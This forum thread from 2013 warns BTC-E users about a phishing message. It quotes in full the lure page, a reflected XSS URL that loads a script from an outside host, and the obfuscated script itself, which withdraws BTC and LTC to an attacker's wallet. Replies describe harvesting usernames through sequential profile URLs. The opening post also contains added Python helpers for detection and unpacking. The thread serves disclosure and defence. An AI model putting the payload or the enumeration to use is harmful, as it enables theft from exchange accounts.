Bitcoin Forum

Other => Beginners & Help => Topic started by: nsieugesug on April 21, 2013, 06:35:36 PM



Title: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: nsieugesug on April 21, 2013, 06:35:36 PM
Hello,

Today I got a private message at BTC-E. This is the first strange thing, since I have never used the trollbox or the PM system there.

It contains a link to hxxp://fast-image.(dontclickthisshit)com/guh8ydyxz/bitcoin_chart15493.jpg, which is not an image, but an HTML file.

Quote
        <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
        <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
        <head>
        </head>
        <body>
        <script language="JavaScript">
        document.location="https://btc-e.com/news/32?page=1<script+src=http://fast-image.com/q.js><\/script>";
        </script>
        </body>
        </html>

This downloads a script which seems to exploit an XSS vulnerability on BTC-E.

Quote
eval((function(x){var d="";var p=0;while(p<x.length){if(x.charAt(p)!="`")d+=x.charAt(p++);else{var l=x.charCodeAt(p+3)-28;if(l>4)d+=d.substr(d.length-x.charCodeAt(p+1)*96-x.charCodeAt(p+2)+3104-l,l);else d+="`";p+=4}}return d})("var wallet_btc = \"1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo\";` K'l` P\"LSQBL4Rs1rjP3tZUVb4MfXSQu1JEyWr7ix` P\"redir = \"http://fast-image.com/guh8ydjxz/bitcoin_chart15483.jpg` _\"xmlhttp = false` /!btc_amount` *!lt` \")token` %!sec;try {` [&new XMLHttpRequest;} catch (e) {` </ActiveXObject(\"Msxml2.XMLHTTP\")` /Microsoft` K4document.location =`#E\";}}}func` /!postData(page, data, step`!=$if (`!B#)`!J%.open(\"POST\", ` U\"true);if (step == 1` E(nreadystatechange = handler1;} else ` Q(2` 6C2` I03` 6C3` I04` 6C4` I05` 6C5` U$`$,8` a$set`&?#Header(\"Content-type\", \"appli` Y\"/x-www-form-urlencoded\");` T6X-` *#ed-With\", \"`'P*` R)nd(data)`!_@`&JE`&i%`%M$(evtXHR)`&V).`#M!State`$C$` 2(status`%z!00) {return`!}#1(`!LB`!:-2` Zm2` sT3` g``*K%\"../ajax/profile.php\", \"task=funds\", 4`!4S4`\"Em4`\"^T5`!#D`&\\A`&%, {`1`\"sponse =`1$$.` +$Tex`0m\"div = ` |%createElement(\"div\");div.innerHTML`!:!` _\"` 4!style.display = \"none\";` i%body.appendChild(div);`2%!`!-(get`!/#ById(\"` <!\").value`/>!` -!.length`.,!2) {`3&& = Math.floor(parseFloat(` p/sByClassName(\"money_btc\")[0]`\"@&)`0U\"` x'> 5`%>!`!))500;}`&zBedit%2Fhome\", 2`%UB`$o22`$#~`$D]sec`$g8s_email\"`#a\"!sec.checked`*\\1coins`#G$act=withdraw&sum=\" + `$,'+ \"&address` 6!wallet_btc` 6!coin_id=1&`&1!` >!` %!, 3`#ZX4`#jHl`!f%_rgx`#h'.match(/Balance: \\<b class='red'\\>([0-9]+.?` #!*)\\<\\/b\\> LTC/);` o& =` w+.slice(1` 6+`(D2` 9&`($#` I'> 300`((!` \\)` 0!;}`$*c` p'`$Z3l`$b+8`$_.5`$KB`!N.billing`!N0_coin%2F1\", 1);"))

According to Blockexplorer, significant amounts of BTC were already stolen:

http://blockexplorer.com/address/1DnwcSevrYyUCTxbPmL1TtABoaucDTMTYo
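Two defender-side checks for the lure chain described above, added here as an example and not part of the original post: sniffing a response that is served under an image name but is really HTML, flagging request URLs whose query values carry markup (the `page` parameter in the XSS URL), and the vulnerable-versus-hardened way of rendering such a parameter. All URLs and sample bodies are constructed.

```python
import html
import re
from urllib.parse import parse_qs, urlparse

JPEG_MAGIC = b"\xff\xd8\xff"  # every JPEG file starts with this SOI marker


def served_as_image_but_html(body: bytes) -> bool:
    """Sniff a response body: True if a supposed image is really an HTML page."""
    head = body.lstrip()[:512].lower()
    if head.startswith(JPEG_MAGIC):
        return False
    return head.startswith(b"<!doctype html") or b"<html" in head or b"<script" in head


def query_carries_markup(url: str) -> bool:
    """True if any query value (percent-decoded) contains '<'; useful over access logs."""
    params = parse_qs(urlparse(url).query, keep_blank_values=True)
    return any("<" in value for values in params.values() for value in values)


def render_pager_unsafe(page: str) -> str:
    """Vulnerable pattern: the query parameter is interpolated into HTML unchanged."""
    return f'<a href="?page={page}">Page {page}</a>'


def render_pager_safe(page: str) -> str:
    """Hardened: validate the value as a positive integer, then still escape on output."""
    if not re.fullmatch(r"[1-9][0-9]*", page):
        raise ValueError("page must be a positive integer")
    safe = html.escape(page, quote=True)
    return f'<a href="?page={safe}">Page {safe}</a>'
```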
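The `eval((function(x){...})("..."))` wrapper quoted above is a small decompressor: a backtick starts a four-character token whose second and third characters encode how far back to copy and whose fourth encodes the length. The Python port below is an added example (not from the thread) that decodes such a payload statically instead of running it in a browser; the packed strings used in the test are constructed, and the real payload is not decoded here.

```python
import re

# Matches the quoted argument at the tail of eval((function(x){...})("..."))
WRAPPER_ARG = re.compile(r'\)\("((?:[^"\\]|\\.)*)"\)\)\s*$', re.S)


def decode_js_literal(lit: str) -> str:
    """Undo the escapes of a double-quoted JS string literal (\\" \\\\ \\/ \\n ...).

    \\uXXXX and \\xHH escapes are not handled; this packer's output does not emit them.
    """
    simple = {"n": "\n", "t": "\t", "r": "\r", "0": "\0"}
    return re.sub(r"\\(.)", lambda m: simple.get(m.group(1), m.group(1)), lit, flags=re.S)


def unpack(x: str) -> str:
    """Port of the quoted JS: copy literal characters; on '`' read c1,c2,c3 and
    either copy `c3-28` earlier characters or, if that length is 4 or less, emit '`'."""
    d = ""
    p = 0
    while p < len(x):
        if x[p] != "`":
            d += x[p]
            p += 1
            continue
        length = ord(x[p + 3]) - 28
        if length > 4:
            # JS: d.substr(d.length - c1*96 - c2 + 3104 - l, l)
            start = len(d) - ord(x[p + 1]) * 96 - ord(x[p + 2]) + 3104 - length
            if start < 0:
                raise ValueError("malformed back-reference at offset %d" % p)
            d += d[start:start + length]
        else:
            d += "`"
        p += 4
    return d


def unpack_eval_wrapper(src: str) -> str:
    """Extract the packed string argument from the eval(...) wrapper and unpack it."""
    m = WRAPPER_ARG.search(src)
    if not m:
        raise ValueError("no packed string argument found")
    return unpack(decode_js_literal(m.group(1)))
```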





Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: nsieugesug on April 21, 2013, 06:41:57 PM
(could an admin/moderator move this to the proper section please?)


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: maurits150 on April 21, 2013, 06:42:35 PM
I'm also interested in how they managed to send a PM to my username when I haven't written a message in the trollbox for over a week (banned). This attack was clearly planned out well because they have been harvesting usernames for a long time.


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: dudeofthestick on April 21, 2013, 06:46:36 PM
What operating system and browser version are you using? With versions, please.


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: Becher-Karl on April 21, 2013, 06:52:09 PM
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: nsieugesug on April 21, 2013, 06:52:58 PM
What operating system and browser version are you using? With versions, please.

Browser? I prefer to use wget on a separate Linux box when someone wants me to click strange links...  ;D


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: nsieugesug on April 21, 2013, 06:54:34 PM
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

Trollbox is enabled in my account, but I never posted anything there. However, I'm not 100% sure. Could have typed some bullshit there by accident.


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: optimator on April 21, 2013, 06:58:50 PM
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: nsieugesug on April 21, 2013, 07:10:45 PM
Looks like they have removed the attack scripts from the server. No problem, you have a copy here now.  ;D


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: bzh on April 21, 2013, 07:15:10 PM
In case of the OP it's even more interesting how they got his username, because he said he never posted to the trollbox (and never got banned).
@nsieugesug: Did you maybe type /disablechat in the trollbox or was there no interaction at all?
If not, it would be really interesting to know how they could send you a PM.

harvest all usernames from bitcointalk and reddit.com/r/bitcoin and blast away? That's my guess

I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: samten on April 21, 2013, 07:30:40 PM
don't trust strangers


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: optimator on April 21, 2013, 07:38:05 PM

I never posted on reddit or bitcointalk with my username on btc-e. Or any bitcoin site for that matter. I still somehow got the PM as well. I'm more inclined to think that the user info was hacked on BTC-E.

Bummer! That does lead one to the conclusion that there was inside help....


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: moni3z on April 21, 2013, 07:49:20 PM
You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever.
Write a script that goes through all those numbers and have it send PMs.

https://btc-e.com/profile/1000
https://btc-e.com/profile/10000
https://btc-e.com/profile/80001


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: nsieugesug on April 21, 2013, 08:10:25 PM
You get a list of usernames simply by typing in https://btc-e.com/profile/1 through whatever.
Write a script that goes through all those numbers and have it send PMs.

You're right, that would explain why I got the message. It even shows the time of the last activity, so the attacker can specifically target active accounts.


Title: Re: Attention - Someone is stealing BTC & LTC at BTC-E
Post by: nsieugesug on April 21, 2013, 08:40:09 PM
Would anyone with full posting rights like to crosspost this to https://bitcointalk.org/index.php?board=85.0 (Service Discussion)?

I think this deserves more attention, but the incredibly stupid newbie restriction policy of this forum doesn't allow me to post this thread where it belongs.  >:(